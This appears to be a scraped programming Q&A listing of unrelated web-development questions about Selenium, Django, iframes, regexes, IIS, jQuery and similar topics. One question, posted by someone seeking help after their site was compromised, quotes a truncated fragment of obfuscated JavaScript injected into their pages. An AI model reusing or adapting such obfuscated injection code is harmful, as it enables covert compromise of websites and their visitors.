I have to select web link when i mouse hover to particular frame in the webpage, the button(link to next page) will be visible. WebElement mainElement = driver.findElement(By.xpath(<frame xpath >)); Actions builder = new Actions(driver); builder.moveToElement(mainElement); WebElement button1 = driver.findElement(By.xpath("//*[@id='currentSkills']/div[1]/div/a")); builder.moveToElement(button1).click().perform(); I am still unable to select the particular link when i execute, the following error am getting org.openqa.selenium.ElementNotVisibleException: Element is not currently visible and so may not be interacted with (WARNING: The server did not provide any stacktrace information) Command duration or timeout: 131 milliseconds But when i hover mouse pointer to the particular frame during AUT(just to move to particular frame without clicking anything), then test is executing sucessfully. • Can't store Data URI to database without stripping + characters

    - by citizencane
I am trying to grab a reference to images with src's in URI scheme. An example would be the images on google.com/news. if I alert(escape(saveObj.image)); I get something like below: data%3Aimage/jpeg%3Bbase64%2C/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCABQAFADASIAAhEBAxEB/8QAHAAAAQUBAQEAAAAAAAAAAAAABgIDBAUHAQAI/8QAPhAAAgECBAMFBgIGCwEAAAAAAQIDBBEABRIhEzFhBkFRcYEUIjKRobFCwRUjJFKC0QcWJSZiY3Jzg7Lw4f/EABoBAAIDAQEAAAAAAAAAAAAAAAMEAAIFBgH/xAAmEQABBAEEAQMFAAAAAAAAAAABAAIDESEEEjFBBRMisVFhcZGh/9oADAMBAAIRAxEAPwAr7L5pD2gyY5JXEtLGAFY/EU2sR1U2+nXF/pZFKuffViGPW5ximQUEz1cNdPNKms6g8TlWBufDcHyxsdLUmqoYqhiWZ1BYtsSe+/ I pass that from the js file and am using django to get that into a mysql table of type utf8_unicode_ci using modelform.save, but when i examine what's in the database, I see: data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCABQAFADASIAAhEBAxEB/8QAHAAAAQUBAQEAAAAAAAAAAAAABgIDBAUHAQAI/8QAPhAAAgECBAMFBgIGCwEAAAAAAQIDBBEABRIhEzFhBkFRcYEUIjKRobFCwRUjJFKC0QcWJSZiY3Jzg7Lw4f/EABoBAAIDAQEAAAAAAAAAAAAAAAMEAAIFBgH/xAAmEQABBAEEAQMFAAAAAAAAAAABAAIDESEEEjFBBRMisVFhcZGh/9oADAMBAAIRAxEAPwAr7L5pD2gyY5JXEtLGAFY/EU2sR1U2 nXF/pZFKuffViGPW5ximQUEz1cNdPNKms6g8TlWBufDcHyxsdLUmqoYqhiWZ1BYtsSe The key difference is that in my database all of the '+' characters from the original have been stripped and replaced with spaces. Any ideas? I'm going blind trying to figure this out! :P

  • execute javascript function in a another iframe when parent is from different domain.

    - by Frushko
The page A.com has 2 iframes B.com/page1 and B.com/page2. This is the code of A.com: <html><body> <iframe src="b.com/page1" name="iframe1" id="iframe1"> <iframe src="b.com/page2"> </body></html> I want to execute js function on B.com/page1 from B.com/page2. Both examples below works well when the parent is from the same domain but not in cross domain scenario: parent.window.frames['iframe1'].SomeFunction(args); or parent.document.getElementById('iframe1').contentWindow.SomeFunction(args); Is there any way to do it?

  • How do i translate this to "simpler" JavaScript?

    - by Julian Weimer
Since i'm working with Titanium i realzed that its current JavaScript Interpreter doesn't accept specific coding-styles. So for for-loops and if-statements i have to have braces, even though i only want to span one line. Furthermore there is more i have to change if i want to use a Javascript Library like underscore.js. This is what Titanium doesn't want to see: if (!(result = result && iterator.call(context, value, index, list))) {_.breakLoop();} if (nativeSome && obj.some === nativeSome) {return obj.some(iterator, context);} var computed = iterator ? iterator.call(context, value, index, list) : value; computed >= result.computed && (result = {value : value, computed : computed}); Can i use a simpler syntax to describe the logic behind those lines of code?

  • Regular Expressions - Match all alphanumeric characters except individual numbers

    - by imaginonic
I would like to create a RegEx to match only english alphanumeric characters but ignore (or discard) isolated numbers in Ruby (and if possible in JS too). Examples: 1) I would like the following to be matched: 4chan 9gag test91323432 asf5asdfaf35edfdfad afafaffe But not: 92342424 343424 34432 and so on.. The above is exactly what I would want. 2) However, I would be really thankful if someone could also include French letters like: é ë ê (These are just few examples of many) 1) is my priority, it's totally okay if 2) is impossible or difficult to implement. Sorry, my regex skills aren't that great (hence this question!) Thank you.

  • IIS 7 problem which does not occur under apache

    - by cc0
I'm hosting a little site using a JavaScript to draw a simple graph. It involves one html index file, some css and some js files. It has all been working perfectly on two different apache servers, but when I set up IIS 7 the ajax calls fail. I get no java debug errors in firefox that I can work with, or any kind of error message at all. Without going into the code itself, does anyone have a similar experience with IIS? This is the first time I'm using IIS so I'm not quite sure what to expect to have trouble with. I'd love some input on this, if I have to delve into the code itself I'll make a new thread, I just thought I'd see if this could be a typical issue. Any help is appreciated!

  • html5media & flowplayer wmode issues...

    - by minusidea
I'm working on our new homepage and need to implement a solution that will run a video across iphone/ipad and the standard web browsers. I found a pretty decent solution with html5media - http://code.google.com/p/html5media/ but ran across an issue with a jquery dropdown falling behind the the swf object (this only happens on FF & IE - works fine on Safari & Chrome because it's loading mp4 instead of a swf object). I know the issue is the wmode setting but can not for the life of me figure out where to set it in the html5media (http://html5media.googlecode.com/svn/trunk/src/html5media.min.js). I'm hoping someone can help me or possibly give me a better solution of implementing the video. You can see the development page at idssite(dot)com/development/index.php - Sorry I can't link I'm being stopped by the spam prevention mechanism. Thanks

  • How can I link in both remote and local assets into a webview?

    - by Greg
I'm loading HTML-formatted content into my app from a web service, then plugging that into a local HTML template that lives within the app. Now, I need to set the UIWebView's BaseURL to point at the remote server so that all relative image links will load. However, I'm also trying to link in some local assets (CSS, JavaScript). Thus far, I have not found any documentation on how to link in local assets without relying on the UIWebView's baseURL. I've tried injecting the absolute file path of my CSS and JS into my HTML template, but it hasn't worked... I don't know if that means that it doesn't work, or if I'm just doing it wrong. Has anyone ever run into this scenario, and if so, how did you address it? Thanks in advance, I really appreciate any tips!

  • Intercept click event on a button, ask for confirmation, then proceed

    - by Blankman
Based on a variable SomeCondition, I need to intercept a click event on a button, and ask for confirmation, if they say ok, proceed, otherwise ignore click. So something like: if(SomeCondition) { // disable click on button var isOk = window.confirm("Are you sure?"); if(isOk) { $("#button1").click(); } } Note: button1 has already been wired up with a click event via javascript from an external .js file that I can't change. I don't know what the click event was bound too, so I have to disable the click if SomeCondition is true, then ask for confirmation, then continue with the click.

    - by qwertymk
I'm trying to create a dynamic GM script. Anyone have any ideas how to go about doing this?

  • Can I access an iframe of the same domain in a separate window?

    - by jozecuervo
How can I detect the presence of and then call a function on a frame that is already loaded in one tab (my iframed facebook app) from a page being loaded in a new tab (from an ad-served link). It seems most examples focus on parent/child iframe communication. In this case, a link will be served from Google Ad Manager, which only allows _top or _blank to be targeted. I want to pass an id through the ad click into the new page/tab on my domain and then JS call over to the frame my app is in to switch state. Both frames are on my domain but not in the same document or window. Is this possible?

  • Using jQuery in WordPress plugin admin page?

    - by Volmar
I have a strange problem that probably have a really simple explanation that i've just havn't found. I'm making a WordPress plugin and i want to use jQuery in my settings-page for the plugin. My JS functions look like this: jQuery(document).ready(function() { alert('load test'); //ADMIN FUNCTION $('#mrc_imp_img').click(function(){ alert("test"); }); //FRONT END FUNCTION $("ul.mrc li").hover(function() { $(this).find('p').fadeIn(); } , function() { $(this).find('p').fadeOut(); }); }); The "load test"-alert is being loaded when the document is ready so jquery is properly loaded. The front end function is being used on pages and that's working fine to. the problem is the admin function, it's not working at all. is there a speial way i have to write a .click()-function to get it to work on my settings-page for the wordpress plugin?

  • Trying to simplify some Javascript with closures

    - by mvalente
Hi, I'm trying to simplify some JS code that uses closures but I am getting nowhere (probably because I'm not grokking closures) I have some code that looks like this: var server = http.createServer(function (request, response) { var httpmethods = { "GET": function() { alert('GET') }, "PUT": function() { alert('PUT') } }; }); And I'm trying to simplify it in this way: var server = http.createServer(function (request, response) { var httpmethods = { "GET": function() { alertGET() }, "PUT": function() { alertPUT() } }; }); function alertGET() { alert('GET'); } function alertPUT() { alert('PUT'); } Unfortunately that doesnt seem to work... Thus: - what am I doing wrong? - is it possible to do this? - how? TIA -- MV

  • Chunks of javascript added to webpages on server

    - by SteD
I've found out that my web pages (mainly index.php, main.html, include.inc) have been injected with a chunk of javascript codes at the very bottom after my original code. <script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(t!='' && t!='iX'){t=''};var K=window[d("%52%65%67%45%78%70")];var p=d("%72%65%70%6c%61%63%65");function C(H,Z){var N=d("%5b" Is it possible for SQL injections to add the chunk of js code to the webpages(like 50 of them are infected)? Or is it a virus on the server itself? I am using Drupal + Ubercart with quite minimal forms inputs.

  • multi row header on Google Visualizations

    - by Elzo Valugi
    I am trying to create a DataTable with a multi row header. I'll exemplify here: | 2008 | 2009 | --------------------------------------------------------- | price | qty. | price | qty | --------------------------------------------------------- | 93993 | 34434 | 34244 | 3434 | ..... The years headers can be fixed as I don't want to do sorting by that. Is there a way to do that in Google Visualizations? Update Attaching it with JS does NOT work, and it will disappear when sorting is done. $(".google-visualization-table-table").prepend("<tr class='google-visualization-table-tr-head'><td colspan='4'>something</tr>");

  • How To Refactor If-else Code Segment?

    - by LostInLib
I'm developing win8(metro style) application with Html5-js-jquery. I have this code segment; GetBoutiqueDetail: function (boutiqueId, options) { if (IsUserLogin()) { //different job A } else { ShowLoginPanel(undefined); } }, GetProductDetail: function (boutiqueId, productId, options) { if (IsUserLogin()) { //different job B } else { ShowLoginPanel(undefined); } }, AddBasket: function (productId, productVariantId, quantity, options) { if (IsUserLogin()) { //different job C } else { ShowLoginPanel(undefined); } },.... .And ~20 functions should check if user login or not. I should call functions like similar to "Library.GetBoutiqueDetail();" So my question is simple, how can I refactor that code to remove these if-else sections ?

  • Active Index is not being persisted in jQuery accordion change event

    - by Xaisoft
    I have an asp.net aspx page and on that page I have a hidden input field with and id of paneIndex. However, when I load the page, the alert shows index 1 which is correct on the first load, but if I open up pane 3 for example, the alert shows 1 still. Am I doing something wrong? In a Custom.js file, I have the following code: $(document).ready(function() { $("#accordion").accordion({ active: 1, collapsible: true, autoHeight: false, change: function(event, ui) { var activeIndex = $("#accordion").accordion('option', 'active'); $("#paneIndex").val(activeIndex); //alert(activeIndex); } }); }); In my server side button click, I have the following code: string activeIndex = Request.Form["paneIndex"]; string script = string.Format(@"<script type=""text/javascript"">var paneIndex = {0};</script>", activeIndex); if(!ClientScript.IsStartupScriptRegistered("JSScript")) ClientScript.RegisterStartupScript(this.GetType(),"JSScript", script);

  • How can I implement lazy loading on a page with 500+ images?

    - by Fedor
I basically have a booking engine unit results page which must show 40 units and per each unit there's 1 large image of the first thumbnail and an X number of accompanying thumbnail images. I've been using the jquery lazy load plugin, but it's not thorough enough ( I'm invoking it on DOM Ready ), plus it doesn't really work in IE ( 50% of the clients use IE so it's a big issue ). What I think I really need to do is not really spit out the image but a fake element such as a span, and possibly modify my code such that if the user views the span, render it into an image element. <span src="/images/foo.gif"> The booking engine relies on JS so I think I might be forced to just rely on ajaxifying all the thumbnails and have event handlers on window scroll, etc in order for the page to be "usable" and load at an average time ( 2-3 seconds instead of 5-30s on high speed DSL/Cable ). I'd appreciate any examples or ideas.

  • jQuery selector loads images from server

    - by Guillaume
Hi! here is the code: <script type="text/javascript"> var ajax_data = '<ul id="b-cmu-rgt-list-videos"><li><a href="{video.url}" '+ 'title="{video.title.strip}"><img src="{video.image}" '+ 'alt="{video.title.strip}" /><span>{video.title}</span></a></li></ul>'; var my_img = $(ajax_data).find('img'); </script>` ajax_data is data from a JS template engine where I need to get some part of it. The problem is that jQuery does a GET on the img src={video.image}: GET /test/%7Bvideo.image%7D HTTP/1.1 (on Firefox Live HTTP headers). This GET generates a 404 from the server. Any clues on how to solve this? Thanks a lot :)
